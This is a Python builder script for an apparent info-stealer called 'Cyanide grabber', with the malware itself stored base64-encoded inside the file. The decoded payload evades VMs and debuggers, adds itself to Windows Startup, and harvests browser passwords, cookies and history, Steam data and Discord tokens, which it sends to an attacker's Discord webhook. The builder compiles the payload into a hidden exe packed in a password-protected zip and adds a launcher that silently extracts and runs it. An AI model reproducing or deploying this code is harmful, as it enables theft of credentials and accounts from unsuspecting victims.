import string
import random
import click
import os
import shutil
import zipfile

from core.logs import banner

from colorama import Fore
from base64 import standard_b64encode as b64encode
from base64 import standard_b64decode as b64decode

launcher = r"""import tempfile
import os
import base64

from zipfile import ZipFile

temp = tempfile.NamedTemporaryFile("wb", delete=False, suffix=".zip")

dirtemp = "WindowsStyle"
dirtempPath = os.path.join( os.path.dirname(os.path.abspath(temp.name)), dirtemp )

base64zip = %b64zip%
filexec = %filexec%
password = %password%

try:
    temp.write(base64.standard_b64decode(base64zip))
finally:
    temp.close()

    if not os.path.exists(dirtempPath): os.mkdir(dirtempPath)

    with ZipFile(temp.name, "r") as archive:
        archive.setpassword(password)
        archive.extractall(dirtempPath)


    os.system(os.path.join(dirtempPath, filexec))
    os.remove(temp.name)"""

mainApp = r"aW1wb3J0IG9zCmltcG9ydCB2ZGYKaW1wb3J0IGpzb24KaW1wb3J0IG51a2VsaWIKaW1wb3J0IHppcGZpbGUKaW1wb3J0IGlvCgpmcm9tIGNvcmUuY29tcG9uZXRzIGltcG9ydCBleHRyYWN0b3IKZnJvbSBjb3JlLmNvbXBvbmV0cyBpbXBvcnQgYW50aXZtCmZyb20gY29yZS5jb21wb25ldHMgaW1wb3J0IHN5c2luZm8KZnJvbSBjb3JlLmNvbXBvbmV0cyBpbXBvcnQgdG9rZW5ncmFiYmVyCgpmcm9tIHRocmVhZGluZyBpbXBvcnQgVGhyZWFkCmZyb20gZGlzY29yZF93ZWJob29rIGltcG9ydCBEaXNjb3JkRW1iZWQsIERpc2NvcmRXZWJob29rCgpjbGFzcyBNYWluOgogICAgZGVmIF9faW5pdF9fKHNlbGYpIC0+IE5vbmU6CiAgICAgICAgc2VsZi53ZWJob29rID0gRGlzY29yZFdlYmhvb2sodXJsPScld2ViaG9vayUnLCB1c2VybmFtZT0iQ3lhbmlkZSIsIGF2YXRhcl91cmw9Imh0dHBzOi8vY2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRzLzEwNjMyMTgxOTEyNTk2NzY3MDIvMTA4NDkxNjQ1OTY0NzU0OTU0MC9DeWFuaWRlLnBuZyIpCgogICAgZGVmIGFudGl2bShzZWxmKToKICAgICAgICBhbnRpdm0uQW50aXZtLnJ1bigpCiAgICAgICAgYW50aXZtLkFudGlkYmcucHJvY19jaGVjaygpCiAgICAgICAgYW50aXZtLkFudGlkYmcuZGxsX2NoZWNrKCkKCiAgICAgICAgYW50aXZtLkFudGlkYmcucHJvY2Vzc19jaGVjaygpCgogICAgZGVmIGNyZWRzSW50b2RpY3Qoc2VsZiwgY3JlZHM6IGxpc3QpOgogICAgICAgIGRhdGFCdWZmZXIgPSB7fQogICAgICAgIGZvciBjZWxsIGluIGNyZWRzOgogICAgICAgICAgICBkYXRhQnVmZmVyLnVwZGF0ZShjZWxsKQogICAgICAgIAogICAgICAgIHJldHVybiBqc29uLmR1bXBzKGRhdGFCdWZmZXIsIGluZGVudD0zKQoKICAgIGRlZiBicm93c2VyKHNlbGYpOgogICAgICAgIGNyZWRzID0gW10KICAgICAgICBmb3Iga2V5IGluIGV4dHJhY3Rvci5icm93c2Vyc19wcm9maWxlOgogICAgICAgICAgICBicm93c2VyID0gZXh0cmFjdG9yLmJyb3dzZXJzX3Byb2ZpbGVba2V5XQoKICAgICAgICAgICAgaWYgb3MucGF0aC5leGlzdHMoYnJvd3Nlcik6CiAgICAgICAgICAgICAgICBwcm9maWxlcyA9IFsiRGVmYXVsdCJdCgogICAgICAgICAgICAgICAgZm9yIGZpbGUgaW4gb3MubGlzdGRpcihicm93c2VyKToKICAgICAgICAgICAgICAgICAgICBpZiBmaWxlLmxvd2VyKCkuc3RhcnRzd2l0aCgicHJvZmlsZSIpOgogICAgICAgICAgICAgICAgICAgICAgICBwcm9maWxlcy5hcHBlbmQoZmlsZSkKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgZm9yIHByb2ZpbGUgaW4gcHJvZmlsZXM6CiAgICAgICAgICAgICAgICAgICAgZXh0cmFjdGlvbiA9IGV4dHJhY3Rvci5FeHRyYWN0KG9zLnBhdGguam9pbihicm93c2VyLCAiTG9jYWwgU3RhdGUiKSkKICAgICAgICAgICAgICAgICAgICBwYXNzd2RzID0gZXh0cmFjdGlvbi5leHRyYWN0UGFzc3dvcmRzKG9zLnBhdGguam9pbihicm93c2VyLCBwcm9maWxlLCAiTG9naW4gRGF0YSIpKQogICAgICAgICAgICAgICAgICAgIGhpc3RvcnkgPSBleHRyYWN0aW9uLmV4dHJhY3RIaXN0b3J5KG9zLnBhdGguam9pbihicm93c2VyLCBwcm9maWxlLCAiSGlzdG9yeSIpKQogICAgICAgICAgICAgICAgICAgIGNvb2tpZXMgPSBleHRyYWN0aW9uLmV4dHJhY3RDb29raWVzKG9zLnBhdGguam9pbihicm93c2VyLCBwcm9maWxlKSkKCiAgICAgICAgICAgICAgICAgICAgc3VtbWFyeSA9IHticm93c2VyOiB7IlBhc3N3b3JkcyI6IHBhc3N3ZHMsICJIaXN0b3J5IjogaGlzdG9yeSwgIkNvb2tpZXMiOiBjb29raWVzfX0KCiAgICAgICAgICAgICAgICAgICAgY3JlZHMuYXBwZW5kKHN1bW1hcnkpCgogICAgICAgIGZvciBrZXkgaW4gZXh0cmFjdG9yLmJyb3dzZXJzOgogICAgICAgICAgICBicm93c2VyID0gZXh0cmFjdG9yLmJyb3dzZXJzW2tleV0KCiAgICAgICAgICAgIGlmIG9zLnBhdGguZXhpc3RzKGJyb3dzZXIpOgogICAgICAgICAgICAgICAgZXh0cmFjdGlvbiA9IGV4dHJhY3Rvci5FeHRyYWN0KG9zLnBhdGguam9pbihicm93c2VyLCAiTG9jYWwgU3RhdGUiKSkKICAgICAgICAgICAgICAgIHBhc3N3ZHMgPSBleHRyYWN0aW9uLmV4dHJhY3RQYXNzd29yZHMob3MucGF0aC5qb2luKGJyb3dzZXIsICJMb2dpbiBEYXRhIikpCiAgICAgICAgICAgICAgICBoaXN0b3J5ID0gZXh0cmFjdGlvbi5leHRyYWN0SGlzdG9yeShvcy5wYXRoLmpvaW4oYnJvd3NlciwgIkhpc3RvcnkiKSkKICAgICAgICAgICAgICAgIGNvb2tpZXMgPSBleHRyYWN0aW9uLmV4dHJhY3RDb29raWVzKG9zLnBhdGguam9pbihicm93c2VyKSkKCiAgICAgICAgICAgICAgICBzdW1tYXJ5ID0ge2Jyb3dzZXI6IHsiUGFzc3dvcmRzIjogcGFzc3dkcywgIkhpc3RvcnkiOiBoaXN0b3J5LCAiQ29va2llcyI6IGNvb2tpZXN9fQoKICAgICAgICAgICAgICAgIGNyZWRzLmFwcGVuZChzdW1tYXJ5KQogICAgICAgIAogICAgICAgIHJldHVybiBjcmVkcwogICAgCiAgICBkZWYgc3RlYW0oc2VsZik6CiAgICAgICAgc3RlYW1Vc2Vyc0NvbmYsIHN0ZWFtQ29uZmlnRGF0YSA9IEZhbHNlCgogICAgICAgIHN0ZWFtVXNlcnMgPSBvcy5wYXRoLmFic3BhdGgob3MucGF0aC5qb2luKG9zLnNlcCwgIlByb2dyYW0gRmlsZXMgKHg4NikiLCAiU3RlYW0iLCAiY29uZmlnIiwgImxvZ2ludXNlcnMudmRmIikpCiAgICAgICAgc3RlYW1Db25maWcgPSBvcy5wYXRoLmFic3BhdGgob3MucGF0aC5qb2luKG9zLnNlcCwgIlByb2dyYW0gRmlsZXMgKHg4NikiLCAiU3RlYW0iLCAiY29uZmlnIiwgImNvbmZpZy52ZGYiKSkKICAgICAgICBzdGVhbVVzZXJEYXRhX3BhdGggPSBvcy5wYXRoLmFic3BhdGgob3MucGF0aC5qb2luKG9zLnNlcCwgIlByb2dyYW0gRmlsZXMgKHg4NikiLCAiU3RlYW0iLCAidXNlcmRhdGEiKSkKCiAgICAgICAgaWYgb3MucGF0aC5leGlzdHMoc3RlYW1Vc2Vycyk6CiAgICAgICAgICAgIHdpdGggb3BlbihzdGVhbVVzZXJzLCAiciIpIGFzIGY6CiAgICAgICAgICAgICAgICBzdGVhbVVzZXJzQ29uZiA9IHZkZi5sb2FkcyhmLnJlYWQoKSkKCiAgICAgICAgaWYgb3MucGF0aC5leGlzdHMoc3RlYW1Db25maWcpOgogICAgICAgICAgICB3aXRoIG9wZW4oc3RlYW1Db25maWcsICJyIikgYXMgZjoKICAgICAgICAgICAgICAgIHN0ZWFtQ29uZmlnRGF0YSA9IHZkZi5sb2FkcyhmLnJlYWQoKSkKCiAgICAgICAgaWYgb3MucGF0aC5leGlzdHMoc3RlYW1Vc2VyRGF0YV9wYXRoKToKICAgICAgICAgICAgYnVmZmVyID0gaW8uQnl0ZXNJTygpCiAgICAgICAgICAgIHdpdGggemlwZmlsZS5aaXBGaWxlKGJ1ZmZlciwgInciKSBhcyBjb25maWd6aXA6CiAgICAgICAgICAgICAgICBmb3Igcm9vdCwgZGlycywgZmlsZXMgaW4gb3Mud2FsayhzdGVhbVVzZXJEYXRhX3BhdGgpOgogICAgICAgICAgICAgICAgICAgIGZvciBmaWxlIGluIGZpbGVzOgogICAgICAgICAgICAgICAgICAgICAgICBmaWxlUGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmaWxlKQogICAgICAgICAgICAgICAgICAgICAgICBjb25maWd6aXAud3JpdGUoZmlsZVBhdGgsIG9zLnBhdGgucmVscGF0aChmaWxlUGF0aCwgc3RlYW1Vc2VyRGF0YV9wYXRoKSkKICAgICAgICAgICAKICAgICAgICAgICAgc2VsZi53ZWJob29rLmFkZF9maWxlKGJ1ZmZlci5nZXR2YWx1ZSgpLCAic3RlYW1Vc2VyRGF0YS56aXAiKQoKICAgICAgICByZXR1cm4gc3RlYW1Vc2Vyc0NvbmYsIHN0ZWFtQ29uZmlnRGF0YTsKICAgICAgICAKICAgIGRlZiBhZGRTdGFydHVwKHNlbGYsIGxpbmtuYW1lOiBzdHIsIHBhdGhFeGVjOiBzdHIpOgogICAgICAgIGlmIG5vdCBvcy5wYXRoLmV4aXN0cyhvcy5wYXRoLmpvaW4ob3MuZW52aXJvblsiQVBQREFUQSJdLCAiTWljcm9zb2Z0IiwgIldpbmRvd3MiLCAiU3RhcnQgTWVudSIsICJQcm9ncmFtcyIsICJTdGFydHVwIiwgbGlua25hbWUpKToKICAgICAgICAgICAgc2NyaXB0ID0gZiIiIgogICAgICAgICAgICAkc2ggPSBOZXctT2JqZWN0IC1Db21PYmplY3QgV1NjcmlwdC5TaGVsbAogICAgICAgICAgICAkdXNlclN0YXJ0dXBGb2xkZXJQYXRoID0gW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgiU3RhcnR1cCIpCiAgICAgICAgICAgICRzaG9ydGN1dEZpbGUgPSAkc2guQ3JlYXRlU2hvcnRjdXQoIiR1c2VyU3RhcnR1cEZvbGRlclBhdGhce2xpbmtuYW1lfS5sbmsiKQogICAgICAgICAgICAkc2hvcnRjdXRGaWxlLlRhcmdldFBhdGggPSAie3BhdGhFeGVjfSIKICAgICAgICAgICAgJHNob3J0Y3V0RmlsZS5TYXZlKCkKICAgICAgICAgICAgIiIiCiAgICAgICAgICAgIHN5c2luZm8ucnVuUG93ZXJzaGVsbChzY3JpcHQpCgoKICAgIGRlZiB0b2tlbihzZWxmKToKICAgICAgICBleHRyYWN0b3IuQW50aV90b2tlbnByb3RlY3Rvci5raWxscHJvdGVjdG9yKCkKICAgICAgICB0b2tlbnMgPSB0b2tlbmdyYWJiZXIuZXh0cmFjdF90b2tlbnMoKS50b2tlbnMKICAgICAgICAKICAgICAgICByZXR1cm4gdG9rZW5zCgogICAgZGVmIHJ1bihzZWxmKToKICAgICAgICBUaHJlYWQodGFyZ2V0PXNlbGYuYW50aXZtKS5zdGFydCgpCiAgICAgICAgc2VsZi5hZGRTdGFydHVwKCJNeUFwcCIsIG9zLnBhdGguYWJzcGF0aChvcy5wYXRoLmRpcm5hbWUoX19maWxlX18pKSkKICAgICAgICAKICAgICAgICB1c2VyQ29uZmlnLCBzdGVhbUNvbmZpZyA9IHNlbGYuc3RlYW0oKQogICAgICAgIGxpc3RDcmVkcyA9IHNlbGYuYnJvd3NlcigpCiAgICAgICAgdG9rZW5zID0gc2VsZi50b2tlbigpCgogICAgICAgIGZvciB0b2tlbiBpbiB0b2tlbnM6CiAgICAgICAgICAgIHVzZXJpbmZvID0gbnVrZWxpYi5hY2NvdW50X2luZm8odG9rZW4pCiAgICAgICAgICAgIAogICAgICAgICAgICAjIGljb24gdXJsIG5vdCB3b3JrCiAgICAgICAgICAgIGVtYmVkID0gRGlzY29yZEVtYmVkKHRpdGxlPXVzZXJpbmZvWyJ1c2VybmFtZSJdLCBpY29uX3VybD1mImh0dHBzOi8vY2RuLmRpc2NvcmRhcHAuY29tL2F2YXRhcnMve3VzZXJpbmZvWydpZCddfS97dXNlcmluZm9bJ2F2YXRhciddfS5wbmciLCBjb2xvcj0iNjU2MTY2IikKICAgICAgICAgICAgZW1iZWQuYWRkX2VtYmVkX2ZpZWxkKG5hbWU9J1Rva2VuJywgdmFsdWU9dG9rZW4pCiAgICAgICAgICAgIGVtYmVkLmFkZF9lbWJlZF9maWVsZChuYW1lPSdMb2NhbGUnLCB2YWx1ZT11c2VyaW5mb1sibG9jYWxlIl0pCiAgICAgICAgICAgIGVtYmVkLmFkZF9lbWJlZF9maWVsZChuYW1lPSdFbWFpbCcsIHZhbHVlPXVzZXJpbmZvWyJlbWFpbCJdKQogICAgICAgICAgICBlbWJlZC5hZGRfZW1iZWRfZmllbGQobmFtZT0nUGhvbmUnLCB2YWx1ZT11c2VyaW5mb1sicGhvbmUiXSkKICAgICAgICAgICAgZW1iZWQuYWRkX2VtYmVkX2ZpZWxkKG5hbWU9J1ZlcmlmaWVkJywgdmFsdWU9c3RyKHVzZXJpbmZvWyJ2ZXJpZmllZCJdKSkKICAgICAgICAgICAgZW1iZWQuc2V0X2Zvb3Rlcih0ZXh0PSdCeSBDeWFuaWRlIGdyYWJiZXInKQoKICAgICAgICAgICAgZW1iZWQuc2V0X3RpbWVzdGFtcCgpCgogICAgICAgICAgICBzZWxmLndlYmhvb2suYWRkX2VtYmVkKGVtYmVkKQoKICAgICAgICBlbWJlZCA9IERpc2NvcmRFbWJlZCh0aXRsZT0nUmVwb3J0JywgY29sb3I9IjY1NjE2NiIpCiAgICAgICAgZW1iZWQuYWRkX2VtYmVkX2ZpZWxkKG5hbWU9J1Rva2VucycsIHZhbHVlPWYiIiJgYGB7dG9rZW5zfWBgYCIiIikKICAgICAgICBlbWJlZC5zZXRfZm9vdGVyKHRleHQ9J0J5IEN5YW5pZGUgZ3JhYmJlcicpCiAgICAgICAgc2VsZi53ZWJob29rLmFkZF9maWxlKGZpbGU9dmRmLmR1bXBzKHVzZXJDb25maWcsIFRydWUpLmVuY29kZSgpLCBmaWxlbmFtZT0iU3RlYW1Vc2Vyc0NvbmZpZy50eHQiKQogICAgICAgIHNlbGYud2ViaG9vay5hZGRfZmlsZShmaWxlPXZkZi5kdW1wcyhzdGVhbUNvbmZpZywgVHJ1ZSkuZW5jb2RlKCksIGZpbGVuYW1lPSJTdGVhbUNvbmZpZy50eHQiKQogICAgICAgIHNlbGYud2ViaG9vay5hZGRfZmlsZShmaWxlPXNlbGYuY3JlZHNJbnRvZGljdChsaXN0Q3JlZHMpLmVuY29kZSgpLCBmaWxlbmFtZT0iUGFzc3dvcmRzLkhpc3RvcnkuQ29va2llcy50eHQiKQogICAgICAgIHNlbGYud2ViaG9vay5hZGRfZW1iZWQoZW1iZWQpCiAgICAgICAgciA9IHNlbGYud2ViaG9vay5leGVjdXRlKCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBUaHJlYWQodGFyZ2V0PU1haW4oKS5ydW4pLnN0YXJ0KCk="


def get_random_string(length=10) -> bytes:
    letters = string.ascii_lowercase
    result_str = ''.join(random.choice(letters) for i in range(length))
    return result_str.encode()

def zipfolder(foldername, target_dir, password: bytes):
    zipobj = zipfile.ZipFile(foldername + '.zip', 'w', zipfile.ZIP_DEFLATED)
    zipobj.setpassword(password)
    rootlen = len(target_dir) + 1
    for base, dirs, files in os.walk(target_dir):
        for file in files:
            fn = os.path.join(base, file)
            zipobj.write(fn, fn[rootlen:])


@click.command()
@click.argument("webhook", required=1, type=str)
@click.option('-o', "--output", type=str, required=1, help="Output file")

def builder(webhook, output):
    password = get_random_string(20)

    stealerpy = output+".py"
    stealerzip = output+".zip"

    launcherpy = output+".l"

    banner.builder()
    print(f"{'-'*30} Configure Cyanide... {'-'*30}")
    
    print(f"[{Fore.GREEN}${Fore.RESET}] Adding webhook...")
    template = b64decode(mainApp.encode()).decode().replace(r"%webhook%", webhook)
    
    print(f"[{Fore.GREEN}${Fore.RESET}] Writing Cyanice...")
    
    with open(stealerpy, "w") as f:
        f.write(template)
    
    print(f"{'-'*30} Compiling Cyanide... {'-'*30}")
    os.system("pyinstaller --noconsole "+stealerpy)
    os.remove(stealerpy)

    print(f"{'-'*30} Configure launcher... {'-'*30}")
    print(f"[{Fore.CYAN}*{Fore.RESET}] Folder zipping...")
    zipfolder(output, os.path.join("dist", output), password)

    zipbase64 = b64encode(open(stealerzip, "rb").read())
    os.remove(stealerzip)

    print(f"[{Fore.CYAN}*{Fore.RESET}] Setup launcher...")
    template = launcher.replace(r"%b64zip%", 'b"'+zipbase64.decode()+'"')
    template = template.replace(r"%password%", 'b"'+password.decode()+'"')
    template = template.replace(r"%filexec%", '"'+output+".exe"+'"')
    
    print(f"[{Fore.GREEN}${Fore.RESET}] Writing launcher...")
    with open(launcherpy, "w") as f:
        f.write(template)
    
    print(f"[{Fore.CYAN}*{Fore.RESET}] Converting to exe...")
    os.system("pyinstaller --onefile --noconsole "+launcherpy)
    os.remove(launcherpy)
    shutil.move(os.path.join("dist", output+".exe"), ".")

    shutil.rmtree("build")
    shutil.rmtree("dist")
    os.remove(output+".spec")

if __name__ == "__main__":
    builder()